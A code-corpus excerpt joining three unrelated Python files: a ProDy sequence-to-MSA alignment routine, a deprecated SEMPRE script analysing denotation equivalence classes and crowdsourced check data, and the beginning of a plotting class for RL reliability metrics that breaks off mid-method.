:arg gap_opening: a negative integer, used to penalise opening a gap
:type gap_opening: int
:arg gap_extension: a negative integer, used to penalise extending a gap
:type gap_extension: int
:arg method: method for pairwise2 alignment.
Possible values are ``"local"`` and ``"global"``
:type method: str
"""
label = kwargs.get('label', None)
chain = kwargs.get('chain', None)
match = kwargs.get('match', MATCH_SCORE)
mismatch = kwargs.get('mismatch', MISMATCH_SCORE)
gap_opening = kwargs.get('gap_opening', GAP_PENALTY)
gap_extension = kwargs.get('gap_extension', GAP_EXT_PENALTY)
method = kwargs.get('method', ALIGNMENT_METHOD)
if isinstance(seq, Atomic):
if isinstance(chain, str):
ag = seq.select('chain {0}'.format(chain))
elif chain is None:
ag = seq
chids = ag.getChids()
if len(unique(chids)) > 1:
LOGGER.warn('%s consists of multiple chains. Please consider selecting one chain'%(seq.getTitle()))
else:
raise TypeError('chain should be a string or None')
if ag is None:
raise ValueError('seq may be None or chain ID may be invalid')
sequence = ag.select('ca').getSequence()
elif isinstance(seq, Sequence):
sequence = str(seq)
ag = None
elif isinstance(seq, str):
sequence = seq
ag = None
else:
raise TypeError('seq must be an atomic class, sequence class, or str not {0}'
.format(type(seq)))
if not isinstance(msa, MSA):
raise TypeError('msa must be an MSA instance')
if label is None:
if ag:
label = ag.getTitle().split('_')[0]
elif isinstance(seq, Sequence):
label = seq.getLabel()
else:
raise ValueError('A label cannot be extracted from seq so please provide one.')
index = msa.getIndex(label)
if index is None and (len(label) == 4 or len(label) == 5):
from prody import parsePDB
try:
structure, header = parsePDB(label[:4], header=True)
except Exception as err:
raise IOError('failed to parse header for {0} ({1})'
.format(label[:4], str(err)))
chid = chain
for poly in header['polymers']:
if chid and poly.chid != chid:
continue
for dbref in poly.dbrefs:
if index is None:
index = msa.getIndex(dbref.idcode)
if index is not None:
LOGGER.info('{0} idcode {1} for {2}{3} '
'is found in {4}.'.format(
dbref.database, dbref.idcode,
label[:4], poly.chid, str(msa)))
label = dbref.idcode
break
if index is None:
index = msa.getIndex(dbref.accession)
if index is not None:
LOGGER.info('{0} accession {1} for {2}{3} '
'is found in {4}.'.format(
dbref.database, dbref.accession,
label[:4], poly.chid, str(msa)))
label = dbref.accession
break
if index is not None:
chain = structure[poly.chid]
if index is None:
raise ValueError('label is not in msa, or msa is not indexed')
try:
len(index)
except TypeError:
pass
else:
raise ValueError('label {0} maps onto multiple sequences, '
'so cannot be used for refinement'.format(label))
if isinstance(index, int):
refMsaSeq = str(msa[index]).upper().replace('-','.')
else:
raise TypeError('The output from querying that label against msa is not a single sequence.')
if method == 'local':
alignment = pairwise2.align.localms(sequence, str(refMsaSeq),
match, mismatch, gap_opening, gap_extension,
one_alignment_only=1)
elif method == 'global':
alignment = pairwise2.align.globalms(sequence, str(refMsaSeq),
match, mismatch, gap_opening, gap_extension,
one_alignment_only=1)
else:
raise ValueError('method should be local or global')
seq_indices = [0]
msa_indices = [0]
for i in range(len(alignment[0][0])):
if alignment[0][0][i] != '-':
seq_indices.append(seq_indices[i]+1)
else:
seq_indices.append(seq_indices[i])
if alignment[0][1][i] != '-':
msa_indices.append(msa_indices[i]+1)
else:
msa_indices.append(msa_indices[i])
seq_indices.pop(0) # The first element was extra for initialisation
msa_indices.pop(0) # The first element was extra for initialisation
seq_indices = array(seq_indices)
msa_indices = array(msa_indices)
if ag:
seq_indices += ag.getResnums()[0] - 1
alignment = MSA(msa=array([array(list(alignment[0][0])), \
array(list(alignment[0][1]))]), \
labels=[ag.getTitle(), label])
return alignment, seq_indices, msa_indices
def alignTwoSequencesWithBiopython(seq1, seq2, **kwargs):
"""Easily align two sequences with Biopython's globalms or localms.
Returns an MSA and indices for use with :func:`.showAlignment`.
Alignment parameters can be provided as keyword arguments.
Default values are as originally set in the proteins.compare
module, but now found in utilities.seqtools.
:arg match: a positive integer, used to reward finding a match
:type match: int
:arg mismatch: a negative integer, used to penalise finding a mismatch
:type mismatch: int
:arg gap_opening: a negative integer, used to penalise opening a gap
:type gap_opening: int
:arg gap_extension: a negative integer, used to penalise extending a gap
:type gap_extension: int
:arg method: method for pairwise2 alignment.
Possible values are 'local' and 'global'
:type method: str
"""
match = kwargs.get('match', MATCH_SCORE)
mismatch = kwargs.get('mismatch', MISMATCH_SCORE)
gap_opening = kwargs.get('gap_opening', GAP_PENALTY)
gap_extension = kwargs.get('gap_extension', GAP_EXT_PENALTY)
method = kwargs.get('method', ALIGNMENT_METHOD)
if method == 'local':
alignment = pairwise2.align.localms(seq1, seq2, match, mismatch, gap_opening, gap_extension)
elif method == 'global':
alignment = pairwise2.align.globalms(seq1, seq2, match, mismatch, gap_opening, gap_extension)
else:
raise ValueError('method should be local or global')
seq_indices = [0]
msa_indices = [0]
for i in range(len(alignment[0][0])):
if alignment[0][0][i] != '-':
seq_indices.append(seq_indices[i]+1)
else:
seq_indices.append(seq_indices[i])
if alignment[0][1][i] != '-':
msa_indices.append(msa_indices[i]+1)
else:
msa_indices.append(msa_indices[i])
seq_indices = array(seq_indices)
msa_indices = array(msa_indices)
alignment = MSA(msa=array([array(list(alignment[0][0])), \
array(list(alignment[0][1]))]))
return alignment, seq_indices, msa_indices
def trimAtomsUsingMSA(atoms, msa, **kwargs):
"""This function uses :func:`.alignSequenceToMSA` and has the same kwargs.
:arg atoms: an atomic structure for trimming
:type atoms: :class:`.Atomic`
:arg msa: a multiple sequence alignment
:type msa: :class:`.MSA`
"""
aln, idx_1, idx_2 = alignSequenceToMSA(atoms, msa, **kwargs)
u, i = unique(idx_2, return_index=True)
resnums_str = ' '.join([str(x) for x in idx_1[i]])
chain = kwargs.get('chain', 'A')
return atoms.select('chain {0} and resnum {1}'.format(chain, resnums_str))
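# Illustrative usage sketch (not part of the original module): aligning a PDB
# chain to an MSA and trimming the structure to the matched residues.  The PDB
# code, chain ID and MSA file name are placeholders.
#     from prody import parsePDB, parseMSA
#     atoms = parsePDB('1abc')
#     msa = parseMSA('PFxxxxx_full.slx')
#     aln, pdb_idx, msa_idx = alignSequenceToMSA(atoms, msa, chain='A')
#     trimmed = trimAtomsUsingMSA(atoms, msa, chain='A')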
|
tables/table-alter/old-fictitious-experiments.py | yash-srivastava19/sempre | 812 | 12686774 |
#!/usr/bin/env python
# -*- coding: utf-8 -*-
"""DEPRECATED. Use fictitious-experiments.py instead."""
import sys, os, shutil, re, argparse, json, gzip
from codecs import open
from itertools import izip
from collections import defaultdict, Counter
def clean(x):
# Remove actual string from names
x = x.decode('utf8').replace(ur'\"', '')
x = re.sub(ur'\(name fb:(?:cell|part)\.([^ )]*)\)', r'(name \1)', x)
x = re.sub(ur'\(name fb:(?:cell|part)\.([^ )]*) [^")]*\)', r'(name \1)', x)
x = re.sub(ur'\(name fb:(?:cell|part)\.([^ )]*) "[^"]*"\)', r'(name \1)', x)
return x
def read_denotation_file(ex_id, fin):
"""Return n, k, d, denotations, grid"""
n, k, d = [int(x) for x in fin.readline().split()]
denotations = []
for i in xrange(d):
denotations.append(clean(fin.readline()[:-1]))
if not denotations:
print >> sys.stderr, 'Warning: no denotations - ', ex_id
elif denotations[0] == '(list)':
print >> sys.stderr, 'Warning: denotations[0] == (list) - ', ex_id
denotations.append(None)
grid = []
for i in xrange(n):
row = [denotations[int(x)] for x in fin.readline()[:-1].split()]
grid.append(row)
denotations.pop()
return n, k, d, denotations, grid
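# Editor's note (inferred from the parsing code above, not from the dump spec):
# each denotation file appears to start with a header line "<n> <k> <d>",
# followed by <d> lines holding one denotation string each, followed by <n>
# lines of space-separated indices into that denotation list, so that
# grid[i][j] is read as the denotation of derivation i on table j.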
################################################
# Count number of equivalence classes
def process1(ex_id, fin):
n, k, d, denotations, grid = read_denotation_file(ex_id, fin)
equiv_classes = {0: set(), 5: set(), 10: set(),
30: set(), 100: set(), 300: set()}
for row in grid:
row = tuple(row)
for num_tables, value in equiv_classes.items():
value.add(row[:num_tables+1])
fields = [ex_id, n, k, d]
for key, value in sorted(equiv_classes.items()):
fields.append(len(value))
print '\t'.join(str(x) for x in fields)
sys.stdout.flush()
# Find out how many are split from main class when going from 30 --> 300
def process2(ex_id, fin):
n, k, d, denotations, grid = read_denotation_file(ex_id, fin)
thirties = defaultdict(Counter)
for row in grid:
row = tuple(row)
thirties[row[:31]][row[:301]] += 1
#thirties[row[:6]][row[:31]] += 1
cores = splits = 0
for key, value in thirties.items():
core = value.most_common(1)[0][1]
cores += core
splits += (sum(value.values()) - core)
fields = [ex_id, n, k, d, len(thirties), cores, splits]
print '\t'.join(str(x) for x in fields)
sys.stdout.flush()
# Find out the splitters from 30 --> 300
def process3(ex_id, fin):
n, k, d, denotations, grid = read_denotation_file(ex_id, fin)
thirties = defaultdict(lambda: defaultdict(list))
counts = Counter()
for i, row in enumerate(grid):
row = tuple(row)
thirties[row[:31]][row].append(i)
counts[row[:31]] += 1
cores = []
splits = []
if counts:
first_thirty_one, count = counts.most_common(1)[0]
full = thirties[first_thirty_one]
# full = map from full denotation tuple to deriv indices
core = max(len(x) for x in full.values())
for indices in full.values():
if len(indices) == core:
cores.extend(indices)
else:
splits.extend(indices)
if not splits:
cores = []
else:
splits = sorted(splits)
fields = [ex_id, n, k, d, len(thirties), len(cores), len(splits),
' '.join(str(x) for x in cores[:30]),
' '.join(str(x) for x in splits[:30])]
print '\t'.join(str(x) for x in fields)
sys.stdout.flush()
# Find out more stuff about annotation
def process5(ex_id, fin, ann_fin, ret_data, size_path, formula_path):
n, k, d, denotations, grid = read_denotation_file(ex_id, fin)
grid = [row[:31] for row in grid]
# Equiv class to list of indices
equiv_classes = defaultdict(list)
for i, row in enumerate(grid):
equiv_classes[tuple(row)].append(i)
# Read annotation
annotations = []
for line in ann_fin:
annotations.append(clean(line[:-1]))
annotations = tuple(annotations[:31])
# Read size
if size_path:
with open(size_path) as fin:
sizes = [int(x) for x in fin]
else:
sizes = [0] * n
sizes_counter = Counter(sizes)
# Read formulas
if formula_path:
with (open if formula_path.endswith('.gz') else gzip.open)(formula_path) as fin:
formulas = fin.readlines()
else:
formulas = [''] * n
score, chosen_entropy = ret_data
chosen_random = range(len(chosen_entropy))
fields = [ex_id, n, k, d, len(equiv_classes),
'{:.3}'.format(score),
' '.join(str(x) for x in chosen_entropy),
' '.join('{}:{}'.format(u, sizes_counter[u])
for u in xrange(1, 9))]
if annotations[0] == 'null':
fields.append('no')
else:
fields.append('yes')
# Count the number of matches
matched = len(equiv_classes[annotations])
fields.append(matched)
# Chosen equiv classes based on chosen tables
def count_on_chosen(chosen):
chosen_annotations = tuple(annotations[x] for x in chosen)
num_classes_matched = 0
num_derivs_matched = []
derivs_matched = []
for key, value in equiv_classes.items():
chosen_key = tuple(key[x] for x in chosen)
if chosen_key == chosen_annotations:
num_classes_matched += 1
num_derivs_matched.append(len(value))
derivs_matched.extend(value)
fields.extend([num_classes_matched, sum(num_derivs_matched)])
fields.append(list(reversed(sorted(num_derivs_matched))))
derivs_matched.sort()
matched_sizes = [sizes[x] for x in derivs_matched]
matched_sizes_counter = Counter(matched_sizes)
fields.append(' '.join('{}:{}'.format(u, matched_sizes_counter[u])
for u in xrange(1, 9)))
# Is the formula with the lowest size the annotated one?
if matched_sizes:
min_size, min_index = min((u,i) for (u,i)
in zip(matched_sizes, derivs_matched))
fields.append([min_size, min_index, formulas[min_index]])
else:
fields.append('')
count_on_chosen(chosen_entropy)
count_on_chosen(chosen_random)
print '\t'.join(str(x) for x in fields)
sys.stdout.flush()
# Find out stuff about annotation; turked version
def process6(ex_id, fin, ann_fin, size_path, formula_path, exec_dir):
# These are only for computing equivalence classes
n, k, d, denotations, grid = read_denotation_file(ex_id, fin)
grid = [row[:31] for row in grid]
# Equiv class to list of indices
equiv_classes = defaultdict(list)
for i, row in enumerate(grid):
equiv_classes[tuple(row)].append(i)
deriv_to_rep = {}
for equiv_class in equiv_classes.values():
rep = min(equiv_class)
for x in equiv_class:
deriv_to_rep[x] = rep
# Read annotation
annotations = []
for line in ann_fin:
annotations.append(clean(line[:-1]))
annotations = tuple(annotations[:31])
# Read size
if size_path:
with open(size_path) as fin:
sizes = [int(x) for x in fin]
else:
sizes = [0] * n
sizes_counter = Counter(sizes)
# Read formulas
if formula_path:
with (open if formula_path.endswith('.gz') else gzip.open)(formula_path) as fin:
formulas = fin.readlines()
else:
formulas = [''] * n
fields = [ex_id, n, k, d, len(equiv_classes),
' '.join('{}:{}'.format(u, sizes_counter[u])
for u in xrange(1, 9))]
correct_class = None
if annotations[0] == 'null':
fields.append('no')
fields.append('')
else:
fields.append('yes')
# Count the number of matches
matched = len(equiv_classes[annotations])
fields.append(matched)
if matched > 0:
correct_class = min(equiv_classes[annotations])
fields.append(correct_class)
def get_flag(x):
if x == '(number 42)' or x == '(name Ao)':
return 'G'
elif x == '(number 13)' or x == '(name Ax)':
return 'F'
elif x == '(number 666)':
return 'B'
elif x == '(number 777)' or x == '(name Bo)':
return 'g'
elif x == '(number 999)' or x == '(name Bx)':
return 'f'
elif x == '(number 88)' or x == '(name X)':
return 'X'
else:
return None
# Read Turk data
if os.path.exists(os.path.join(exec_dir, 'denotations')):
prefix = ''
else:
prefix = 'actual-'
with gzip.open(os.path.join(exec_dir, prefix + 'denotations', 'nt-{}.gz'.format(ex_id))) as fin:
_, _, _, _, turk_grid = read_denotation_file(ex_id, fin)
with gzip.open(os.path.join(exec_dir, 'check-denotations', 'nt-{}.gz'.format(ex_id))) as fin:
_, _, _, _, check_grid = read_denotation_file(ex_id, fin)
check_grid = [[get_flag(x) for x in y] for y in check_grid]
with gzip.open(os.path.join(exec_dir, prefix + 'annotated-denotations', 'nt-{}.gz'.format(ex_id))) as fin:
anno_grid = [x[:-1] for x in fin]
with gzip.open(os.path.join(exec_dir, 'check-annotated-denotations', 'nt-{}.gz'.format(ex_id))) as fin:
check_anno_grid = [x[:-1] for x in fin]
check_anno_grid = [get_flag(x) for x in check_anno_grid]
# Used indices
if check_grid:
used_indices = [i for (i,x) in enumerate(check_grid[0]) if x is not None]
flags = [check_grid[0][i] for i in used_indices]
else:
used_indices = [i for (i,x) in enumerate(anno_grid) if x is not None]
flags = [check_anno_grid[i] for i in used_indices]
fields.append(used_indices)
fields.append(''.join([{'G': 'A', 'F': 'A', 'B': 'B',
'g': 'B', 'f': 'B', 'X': 'X', None: '?'}[x] for x in flags]))
fields.append(check_anno_grid[0])
# Scheme is a function that takes in a check vector (only for used indices)
# and return True (matched) or False (not matched).
#
# For each possible scheme, compute
# - number of classes matched
# - number of formulas matched
# - class sizes
# - whether the annotated formula matches turked data
# - whether the "correct" class is among the matched classes
def check_scheme(scheme):
hello = []
for check_vector in check_grid:
hello.append(scheme([check_vector[x] for x in used_indices]))
hello_anno = scheme([check_anno_grid[x] for x in used_indices])
# num classes matched
matched_derivs = [i for (i,x) in enumerate(hello) if x]
matched_classes = set(deriv_to_rep[x] for x in matched_derivs)
fields.append(len(matched_classes))
fields.append(len(matched_derivs))
class_sizes = [(len(equiv_classes[tuple(grid[x])]), x) for x in matched_classes]
#class_sizes.sort(key=lambda x: -x[0])
#fields.append([x[1] for x in class_sizes])
#fields.append([x[0] for x in class_sizes])
# manually annotated formula
fields.append(hello_anno)
# correct is among?
fields.append(correct_class in matched_classes)
def no_big_f(vector):
return all(x != 'F' for x in vector)
check_scheme(no_big_f)
def no_f_ever(vector):
return all((x != 'f' and x != 'F') for x in vector)
check_scheme(no_f_ever)
def at_most_one_big_f(vector):
return sum([x == 'F' for x in vector], 0) <= 1
check_scheme(at_most_one_big_f)
print '\t'.join(str(x) for x in fields)
sys.stdout.flush()
# Dump equivalence classes to a file
def process7(ex_id, fin, ann_fin, size_path, formula_path, exec_dir, outdir):
n, k, d, denotations, grid = read_denotation_file(ex_id, fin)
denotations_set = set(denotations)
#grid = [row[:31] for row in grid]
# Read annotation
annotations = []
for line in ann_fin:
annotations.append(clean(line[:-1]))
for x in set(annotations):
if x not in denotations_set and n > 0:
print >> sys.stderr, 'WTF:', ex_id, n, k, d, x
annotations = tuple(annotations)
print annotations
#annotations = annotations[:31]
# Read size
if size_path:
with open(size_path) as fin:
sizes = [int(x) for x in fin]
else:
sizes = [0] * n
sizes_counter = Counter(sizes)
# Read formulas
if formula_path:
with (open if formula_path.endswith('.gz') else gzip.open)(formula_path) as fin:
formulas = [x.strip() for x in fin.readlines()]
else:
formulas = [''] * n
fields = [ex_id, n, k, d]
if annotations[0] == 'null':
fields.append('no')
else:
fields.append('yes')
def get_flag(x):
if x == '(name Ao)':
return 'G'
elif x == '(name Ax)':
return 'F'
elif x == '(name Bo)':
return 'g'
elif x == '(name Bx)':
return 'f'
elif x == '(name X)':
return 'X'
else:
assert x is None or x == 'null'
return None
# Read Turk data
with gzip.open(os.path.join(exec_dir, 'actual-denotations', 'nt-{}.gz'.format(ex_id))) as fin:
_, _, _, _, turk_grid = read_denotation_file(ex_id, fin)
with gzip.open(os.path.join(exec_dir, 'check-denotations', 'nt-{}.gz'.format(ex_id))) as fin:
_, _, _, _, check_grid = read_denotation_file(ex_id, fin)
check_grid = [[get_flag(x) for x in y] for y in check_grid]
with gzip.open(os.path.join(exec_dir, 'actual-annotated-denotations', 'nt-{}.gz'.format(ex_id))) as fin:
anno_grid = [x[:-1] for x in fin]
with gzip.open(os.path.join(exec_dir, 'check-annotated-denotations', 'nt-{}.gz'.format(ex_id))) as fin:
check_anno_grid = [x[:-1] for x in fin]
check_anno_grid = [get_flag(x) for x in check_anno_grid]
# Dump equivalence classes
# Also dump whether the class
# - Matches the annotated formula
# - Matches the turked data
deno_tuple_to_indices = defaultdict(list)
for i, row in enumerate(grid):
row = tuple(row)
deno_tuple_to_indices[row].append(i)
classes = []
flag_counts_classes = [0, 0, 0, 0]
flag_counts_formulas = [0, 0, 0, 0]
for deno_tuple, indices in deno_tuple_to_indices.iteritems():
real = all(x != 'F' for x in check_grid[indices[0]])
ideal = (deno_tuple == annotations)
classes.append([real, ideal, indices])
flag_counts_classes[real * 2 + ideal] += 1
flag_counts_formulas[real * 2 + ideal] += len(indices)
classes.sort(key=lambda x: (-x[0]-x[1], -x[0], -len(x[2])))
fields.append(len(classes))
fields.extend(flag_counts_classes)
fields.extend(flag_counts_formulas)
with open(os.path.join(outdir, 'nt-' + str(ex_id)), 'w') as fout:
print >> fout, '{} classes ({} formulas) {{'.format(len(classes), n)
for i, (real, ideal, indices) in enumerate(classes):
equiv_class = [(sizes[i], formulas[i]) for i in indices]
equiv_class.sort(key=lambda x: x[1])
print >> fout, ' CLASS {} ({} formulas){}{} {{'.format(
i, len(equiv_class), '[IDEAL]' if ideal else '',
'[TURK]' if real else '')
for s, f in equiv_class:
print >> fout, ' ', s, f
print >> fout, ' }'
print >> fout, '}'
print '\t'.join(str(x) for x in fields)
sys.stdout.flush()
# Dump matching formulas to a file
def process8(ex_id, fin, formula_path, exec_dir, outdir):
# Actually fin is not needed ...
n, k, d = [int(x) for x in fin.readline().split()]
fields = [ex_id, n, k, d]
def get_flag(x):
if x == '(name Ao)':
return 'G'
elif x == '(name Ax)':
return 'F'
elif x == '(name Bo)':
return 'g'
elif x == '(name Bx)':
return 'f'
elif x == '(name X)':
return 'X'
else:
assert x is None or x == 'null'
return None
# Read Turk data
with gzip.open(os.path.join(exec_dir, 'check-denotations', 'nt-{}.gz'.format(ex_id))) as fin:
_, _, _, _, check_grid = read_denotation_file(ex_id, fin)
check_grid = [[get_flag(x) for x in y] for y in check_grid]
if n > 0:
used_indices = [i for (i,x) in enumerate(check_grid[0]) if x is not None]
flags = [check_grid[0][i] for i in used_indices]
else:
used_indices = []
flags = []
fields.append(''.join([{'G': 'A', 'F': 'A', 'B': 'B',
'g': 'B', 'f': 'B', 'X': 'X', None: '?'}[x] for x in flags]))
# Get the "correct" derivations
corrects = []
cur_i = 0
with gzip.open(formula_path) as fin:
for line in fin:
line = line.strip()
if line.startswith('(derivation (formula'):
if all(check_grid[cur_i][i] != 'F' for i in used_indices):
corrects.append(line)
cur_i += 1
fields.append(len(corrects))
# Dump matching formulas
with gzip.open(os.path.join(outdir, 'nt-{}.gz'.format(ex_id)), 'w') as fout:
for correct in corrects:
print >> fout, correct
print '\t'.join(str(x) for x in fields)
sys.stdout.flush()
def main():
parser = argparse.ArgumentParser()
parser.add_argument('-s', '--step', type=int, default=1)
parser.add_argument('-a', '--annotation-dir',
help='directory to search for dumped annotated formula denotations')
parser.add_argument('-r', '--retained-tables',
help='path to retained-tables file')
parser.add_argument('-z', '--sizes-dir',
help='path to sizes directory')
parser.add_argument('-f', '--formulas-dir',
help='path to formulas directory')
parser.add_argument('-e', '--exec-dir',
help='path to exec dir with denotations, annotated-denotations, check-*')
parser.add_argument('-R', '--range', nargs=2, type=int,
help='range of example ids')
parser.add_argument('denotation_dir',
help='directory to search for dumped denotations')
parser.add_argument('-o', '--outdir',
help='output directory')
args = parser.parse_args()
# Read denotation directories
ex_id_to_path = {}
directory = args.denotation_dir
for filename in os.listdir(directory):
match = re.match(r'nt-(\d+)\.gz', filename)
assert match, filename
ex_id_to_path[int(match.group(1))] = os.path.join(directory, filename)
print >> sys.stderr, 'There are', len(ex_id_to_path), 'denotation files'
ex_id_to_ann_path = {}
if args.annotation_dir:
directory = args.annotation_dir
for filename in os.listdir(directory):
match = re.match(r'nt-(\d+)\.gz', filename)
assert match, filename
ex_id_to_ann_path[int(match.group(1))] = os.path.join(directory, filename)
print >> sys.stderr, 'There are', len(ex_id_to_ann_path), 'annotated denotation files'
ex_id_to_size_path = {}
if args.sizes_dir:
directory = args.sizes_dir
for filename in os.listdir(directory):
match = re.match(r'nt-(\d+)', filename)
assert match, filename
ex_id_to_size_path[int(match.group(1))] = os.path.join(directory, filename)
print >> sys.stderr, 'There are', len(ex_id_to_size_path), 'annotated sizes files'
ex_id_to_formula_path = {}
if args.formulas_dir:
directory = args.formulas_dir
for filename in os.listdir(directory):
match = re.match(r'nt-(\d+)(\.gz)?', filename)
assert match, filename
ex_id_to_formula_path[int(match.group(1))] = os.path.join(directory, filename)
print >> sys.stderr, 'There are', len(ex_id_to_formula_path), 'annotated formulas files'
if args.retained_tables:
ret_data = {}
with open(args.retained_tables) as fin:
for line in fin:
line = line[:-1].split('\t')
ex_id = int(line[0][3:])
score = float(line[1])
chosen = [int(x) for x in line[2].split()]
ret_data[ex_id] = (score, chosen)
print >> sys.stderr, 'STEP:', args.step
for i, ex_id in enumerate(sorted(ex_id_to_path)):
if i % 20 == 0:
print >> sys.stderr, 'Processing', i
if args.range and not (args.range[0] <= i <= args.range[1]):
continue
with gzip.open(ex_id_to_path[ex_id]) as fin:
if args.step == 1:
process1(i, fin)
elif args.step == 2:
process2(i, fin)
elif args.step == 3:
process3(i, fin)
elif args.step == 5:
with gzip.open(ex_id_to_ann_path[ex_id]) as ann_fin:
process5(i, fin, ann_fin, ret_data[ex_id],
ex_id_to_size_path.get(i),
ex_id_to_formula_path.get(i))
elif args.step == 6:
with gzip.open(ex_id_to_ann_path[ex_id]) as ann_fin:
process6(i, fin, ann_fin,
ex_id_to_size_path.get(i),
ex_id_to_formula_path.get(i),
args.exec_dir)
elif args.step == 7:
assert args.outdir
if not os.path.exists(args.outdir):
os.makedirs(args.outdir)
with gzip.open(ex_id_to_ann_path[ex_id]) as ann_fin:
process7(i, fin, ann_fin,
ex_id_to_size_path.get(i),
ex_id_to_formula_path.get(i),
args.exec_dir, args.outdir)
elif args.step == 8:
assert args.outdir
if not os.path.exists(args.outdir):
os.makedirs(args.outdir)
process8(i, fin,
ex_id_to_formula_path.get(i),
args.exec_dir, args.outdir)
print >> sys.stderr, 'DONE!'
if __name__ == '__main__':
main()
|
rl_reliability_metrics/analysis/plotter.py | mcx/rl-reliability-metrics | 122 | 12686781 | # coding=utf-8
# Copyright 2019 The Authors of RL Reliability Metrics.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Class for making plots of robustness metric results and statistics."""
import datetime
import math
import os
from absl import logging
from matplotlib import pyplot as plt
import numpy as np
from rl_reliability_metrics.analysis import io_utils_oss as io_utils
from rl_reliability_metrics.analysis import plot_utils
from rl_reliability_metrics.analysis import stats
from rl_reliability_metrics.analysis import stats_utils
# Internal gfile dependencies
HATCH_PATTERNS = ('-', '/', '.', 'O', '+', 'o', 'x', '*', '\\')
ALGO_COLORS = ('r', 'y', 'g', 'b', 'm')
MARKERS = ('o', 's', 'v', '^', '<', '>')
TIMEFRAME_NAMES = ['Beginning', 'Middle', 'End']
UP_ARROW = r' $\uparrow$'
DOWN_ARROW = r' $\downarrow$'
class Plotter(object):
"""Class for making plots of metric results and statistics."""
def __init__(self,
data,
pvals_dir,
confidence_intervals_dir,
n_timeframes,
algorithms=None,
out_dir=None,
pthresh=0.01,
multiple_comparisons_method='benjamini-yekutieli',
subplot_axis_labels=True,
make_legend=False):
"""Initialize Plotter object.
Args:
data: DataDef object containing all the metric results.
pvals_dir: Path to directory containing p-values for comparisons between
pairs of algorithms.
confidence_intervals_dir: Path to directory containing bootstrap
confidence intervals.
n_timeframes: Total number of timeframes we are dividing each run into.
algorithms: If specified, these algorithms will be plotted, in this order.
If None, we plot all algorithms available in the data (order not
guaranteed).
out_dir: Path to directory where we save the plot images. If None, we
simply display the images without saving.
pthresh: p-value threshold for significance.
multiple_comparisons_method: String indicating method to use for multiple
comparisons correction. See self._do_multiple_comparisons_correction for
options.
subplot_axis_labels: Whether to add x- and y-axis labels for each subplot.
make_legend: Whether to make a legend.
"""
self.data_def = data
self.pvals_dir = pvals_dir
self.confidence_intervals_dir = confidence_intervals_dir
self.n_timeframes = n_timeframes
self.out_dir = out_dir
self.pthresh = pthresh
self.multiple_comparisons_method = multiple_comparisons_method
self.subplot_axis_labels = subplot_axis_labels
self.make_legend = make_legend
# Parse information from data_def
self.dataset = self.data_def.dataset
self.algorithms = algorithms if algorithms else self.data_def.algorithms
self.n_algo = len(self.algorithms)
self.n_task = len(self.data_def.tasks)
# Bonferroni-corrected p-value threshold
self.pthresh_corrected = stats_utils.multiple_comparisons_correction(
self.n_algo, self.pthresh, self.multiple_comparisons_method)
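# --- Illustrative usage (editor's sketch, not part of the original file) ---
# Downstream code would typically construct and drive the plotter roughly as:
#
#     plotter = Plotter(data=data_def, pvals_dir='/tmp/pvals',
#                       confidence_intervals_dir='/tmp/cis',
#                       n_timeframes=3, out_dir='/tmp/plots')
#     plotter.make_plots('IqrAcrossRuns')
#
# The paths and the metric name here are hypothetical; the metric must exist in
# the DataDef results and in plot_utils.METRICS_DISPLAY_NAMES.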
def make_plots(self, metric):
"""Make all plots for a given metric.
Args:
metric: String name of the metric.
"""
plot_utils.paper_figure_configs()
# Create a metric-specific StatsRunner object
stats_runner = stats.StatsRunner(self.data_def, metric, self.n_timeframes)
result_dims = stats_runner.result_dims
if result_dims == 'ATRP':
# Within-runs metric with eval points.
self._make_plots_with_eval_points(metric, stats_runner)
elif result_dims == 'ATR':
# Within-runs metrics without eval points (one value per run).
self._make_plots_no_eval_points(metric, stats_runner)
elif result_dims == 'ATP':
# Across-runs metric with eval points
self._make_plots_with_eval_points(metric, stats_runner)
else:
raise ValueError('plotting not implemented for result_dims: %s' %
result_dims)
def _save_fig(self, metric, plot_name):
timestamp = datetime.datetime.now().strftime('%Y%m%d_%H%M%S_%f')
filepath = os.path.join(self.out_dir,
'%s__%s__%s.png' % (metric, plot_name, timestamp))
io_utils.makedirs(os.path.dirname(filepath))
with open(filepath, 'wb') as f:
plt.savefig(f)
logging.info('Plot output to: %s', filepath)
def _make_plots_with_eval_points(self, metric, stats_runner):
"""Make plots for a metric evaluated at multiple evaluation points per run.
e.g. 'ATP' or 'ATRP' metrics.
Plot 1: raw metric values per task.
* One subplot per task.
* Each subplot contains a plot showing the metric values across evaluation
points. For ATRP metrics, we show the median metric values and fill plots
indicating the IQR at each evaluation point.
Plot 2: Mean rankings across tasks.
* One subplot per timeframe.
* One bar plot showing the mean ranking for each algorithm, and horizontal
line segments indicating which pairs of algorithms are statistically
different.
Args:
metric: String specifying the metric.
stats_runner: StatsRunner object
"""
# Set up figure for per-task raw values.
subplot_ncol_1 = 4
n_subplots_1 = self.n_task + 1 if self.make_legend else self.n_task
subplot_nrow_1 = math.ceil(n_subplots_1 / subplot_ncol_1)
fig1 = plt.figure(figsize=(4 * subplot_ncol_1, 4 * subplot_nrow_1))
# Set up figure for mean rankings.
subplot_ncol_2 = self.n_timeframes
if self.make_legend:
subplot_ncol_2 += 1
subplot_nrow_2 = 1
fig2 = plt.figure(figsize=(4 * subplot_ncol_2, 4 * subplot_nrow_2))
##=== Plot 1: Raw metric values per task ===##
plt.figure(fig1.number)
eval_point_idxs = stats_runner.get_timeframe_points(None)
eval_point_values = self.data_def.metric_params[metric]['eval_points']
metric_results = stats_runner.load_metric_results(
self.algorithms, eval_point_idxs, collapse_on_timepoints=False)
result_dims = stats_runner.result_dims
for i_task in range(self.n_task):
plt.subplot(subplot_nrow_1, subplot_ncol_1, i_task + 1)
task_results = np.squeeze(metric_results[:, i_task])
if len(eval_point_idxs) == 1:
task_results = np.expand_dims(task_results, -1)
if result_dims == 'ATP':
# For across-run metrics, we plot a single curve.
for i_algo in range(self.n_algo):
plt.plot(eval_point_values, task_results[i_algo, :],
marker=MARKERS[i_algo])
if self.subplot_axis_labels:
plt.xlabel('evaluation points', fontsize=16)
plt.ylabel('metric values', fontsize=16)
elif result_dims == 'ATRP':
# For per-run metrics, we plot the median and IQR across curves.
for i_algo in range(self.n_algo):
algo_color = ALGO_COLORS[i_algo]
